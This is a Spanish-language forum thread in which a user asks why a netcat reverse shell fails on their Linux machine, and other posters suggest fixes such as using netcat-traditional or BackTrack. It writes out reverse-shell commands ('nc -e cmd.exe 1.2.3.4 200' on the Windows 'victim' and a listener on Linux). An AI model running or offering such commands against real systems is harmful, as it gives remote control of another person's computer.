Buenas.
A ver, primero de todo decir que utilizo el netcat desde Linux que lo instale desde los paquetes que te da synaptic.
Una vez ya he encontrado los puertos abiertos de dicha IP lo conecto y me sale un mensaje que hace 30 minutos no me salia: 220 Ftp firmware update utility
Esto hace que no puedo continuar con el código para penetrar en la shell y me quede allí encallado.
¿Soluciones?
Saludos!!!
Podrias colocar los pasos que realizas con netcat.
Datos que nos podrias dejar:
El comando que utilizas PcVictima para dejar el puerto abierto.
El comando que utilizas PcAtacante para conectarte al servidor.
Con estos datos podriamos ver en que te estas equivocando.
Saludos.
Utilizo shell inversa. El ordenador atacante en este caso es Linux y el atacante es un Windows.
Primero de todo en Linux :
nc -vv -l -p 200
ERROR :
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [hostname] [port[s]]
Luego en Windows :
nc -e cmd.exe 1.2.3.4 200
Y finalmente si en Linux no saltara error tendría que ya conectarse automáticamente y obtener códigos de la shell.
La verdad es que en Linux ya tengo los dos paquetes que indica instalados, así que no se de que erros se debe tratar...
¿¿Igual de utilizar el netcat de netcat-traditional package??
el comando en windows seria nc -v ip puerto -e cmd.exe
el de linux seria nc -vv -l -p puerto
lo acabo de probar en bactrack y me funciono bien
en todo caso descargatelo y compila el codigo fuente del nc de linux.
Ami antes tambien me paso y compile mi nc con algunas modificaciones caseras
Código compilado y puesto en Linux, probando con otros comandos... Resultado; el mismo. :(
En backtrack por ejemplo si me funciona, pero yo lo quiero tener en mi Linux de uso diario y no en Live USB!!